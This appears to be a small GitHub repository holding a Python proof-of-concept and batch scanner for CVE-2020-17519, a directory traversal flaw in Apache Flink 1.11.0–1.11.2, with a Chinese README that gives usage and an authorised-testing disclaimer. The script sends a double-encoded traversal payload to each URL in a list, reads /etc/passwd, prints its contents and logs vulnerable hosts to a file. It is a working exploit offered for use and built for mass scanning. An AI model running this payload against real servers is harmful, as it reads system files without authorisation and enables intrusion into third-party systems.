├── CVE-2020-17519.png
├── CVE-2020-17519.py
└── README.md


/CVE-2020-17519.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/B1anda0/CVE-2020-17519/c1890a50c1b282eade1dece50d8eaba64ed9a106/CVE-2020-17519.png


--------------------------------------------------------------------------------
/CVE-2020-17519.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # coding:utf-8
 3 | # author:B1anda0
 4 | #affected versions are Apache Flink 1.11.0-1.11.2
 5 | 
 6 | import requests,sys,colorama
 7 | from colorama import *
 8 | init(autoreset=True)
 9 | 
10 | 
11 | banner='''\033[1;33;40m
12 |   _______      ________    ___   ___ ___   ___        __ ______ _____ __  ___  
13 |  / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ |____  | ____/_ |/ _ \ 
14 | | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| |   / /| |__  | | (_) |
15 | | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |  / / |___ \ | |\__, |
16 | | |____   \  /  | |____    / /_| |_| / /_| |_| |      | | / /   ___) || |  / / 
17 |  \_____|   \/   |______|  |____|\___/____|\___/       |_|/_/   |____/ |_| /_/                                                                                                                                                 
18 | '''
19 | 
20 | 
21 | def verify():
22 | 	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
23 | 	payload= '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd' 
24 | 	poc=urls+payload
25 | 	try:
26 | 		requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
27 | 		response=requests.get(poc,headers=headers,timeout=15,verify=False)
28 | 		if response.status_code==200 and "root:x" in response.content:
29 | 			print(u'\033[1;31;40m[+]{} is apache flink directory traversal vulnerability'.format(urls))
30 | 			print(response.content)
31 | 			#将漏洞地址输出在Vul.txt中
32 | 			f=open('./vul.txt','a')
33 | 			f.write(urls)
34 | 			f.write('\n')
35 | 		else:
36 | 			print('\033[1;32;40m[-]{} None'.format(urls))
37 | 	except:
38 | 		print('{} request timeout'.format(urls))
39 | 
40 | 
41 | if __name__ == '__main__':
42 | 	print (banner)
43 | 	if len(sys.argv)!=2:
44 | 		print('Example:python CVE-2020-17519.py urls.txt')
45 | 	else:
46 | 		file = open(sys.argv[1])
47 | 		for url in file.readlines():
48 | 			urls=url.strip()
49 | 			if urls[-1]=='/':
50 | 				urls=urls[:-1]
51 | 			verify()
52 | 		print ('Check Over')
53 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## 使用方法&免责声明
 2 | 
 3 | 该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。
 4 | 
 5 | 使用方法：`Python CVE-2020-17519.py urls.txt`
 6 | 
 7 | urls.txt 中每个url为一行，漏洞地址输出在vul.txt中
 8 | 
 9 | ##### 影响版本：
10 | 
11 | Apache Flink 1.11.0、1.11.1、1.11.2
12 | 
13 | 
14 | 
15 | 工具仅用于安全人员安全测试，任何未授权检测造成的直接或者间接的后果及损失，均由使用者本人负责
16 | 


--------------------------------------------------------------------------------